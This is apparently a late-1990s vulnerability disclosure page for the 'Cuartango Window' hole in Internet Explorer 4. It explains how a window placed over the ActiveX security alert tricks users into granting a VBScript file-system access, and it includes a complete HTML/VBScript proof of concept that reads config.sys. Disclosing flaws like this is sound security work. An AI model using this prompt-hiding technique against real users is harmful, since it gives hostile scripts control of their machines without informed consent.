|
Cuartango Window http://pages.whowhere.com/computers/cuartangojc/cuartangow1.html Affected software Microsoft Internet Explorer 4 Risks Your computer is at risk a malicious VBScript can get full control over your system. The VBScript can de everything : delete files, install viruses, read your files ... Technical description When Microsoft Internet Explorer detects that a Visual Basic Script included in an HTML page will create an object ("CreateObject" sentence) your file system a security alert dialog is displayed : Nobody with a minimum knowledge about ActiveX and VB Scripts would accept this dialog. If you click the "yes" button your have given FULL CONTROL of your machine to the VB Script code. The vulnerability comes from the fact that is possibleto hide this dialog box and get FULL CONTROL over the victim machine. The key idea is very simple : just display a window over the security alert hiding the message and replacing it by another friendly message but keeping visible the buttons of the original message. I will show you how the malicious script will work : First we open a friendly window (The Cuartango Window) : set wcover = window.open ("welcome.htm", "Welcome . . . ) Next instruction will generate the security alert because we are accesing the file system this prompt will be behind the welcome window !!! Set fs = CreateObject("Scripting.FileSystemObject") At this moment instead of the alert shown above what we see is : If the YES button is clicked the script has FULL CONTROL. The welcome window in no longer needed and we close it wcover.close At this point we are the script owns the machine as an, example I will get the autoexec.bat file and display it in a text box. But the script could do everything on your machine, delete all your files, install a virus ... Set myfile = fs.OpenTextFile("c:\config.sys") content = myfile.readall myfile.Close document.form1.s1.value = content ----------exploit code example---------- <html> <head> <meta name="description" content="Explorer vulnerability : Cuartango Window hole"> <meta name="GENERATOR" content="Microsoft FrontPage 3.0"> <meta name="keywords" content="activex security,explorer security hole,explorer vulnerability,cuartango window,cuartango hole,cuartango hack,activex hole,vbscript hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer"> <title>Cuartango Window demo</title> </head> <body bgcolor="#C0C0C0"> <script language="VBScript"> if instr(1,navigator.userAgent,"MSIE") = 0 then msgbox "Please, use Microsoft Internet Explorer",0,"GoodBye" window.navigate "http://www.microsoft.com" end if if window.screen.width <> 800 then alert "Your screen resolution must be 800 x 600" window.navigate "cuartangow1.html" else ' coordinates given for 800 x 600 set wcover = window.open ("welcometrick.html", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no") Set fs = CreateObject("Scripting.FileSystemObject") wcover.close Set myfile = fs.OpenTextFile("c:\config.sys") content = myfile.readall myfile.Close end if </script> <h1 align="center"><font color="#FF0000">Cuartango Window Demo</font></h1> <p align="center"><strong>This example shows you how ActiveX could destroy your system. As an example I have read your config.sys file</strong><br> Back to <a href="cuartangow1.html">Cuartango Window Page</a></p> <form method="POST" name="form1"> <div align="center"><center><p><textarea rows="18" name="S1" cols="49"></textarea></p> </center></div> </form> <script language="VBScript"> document.form1.s1.value = content </script> <p> </p> </body> </html>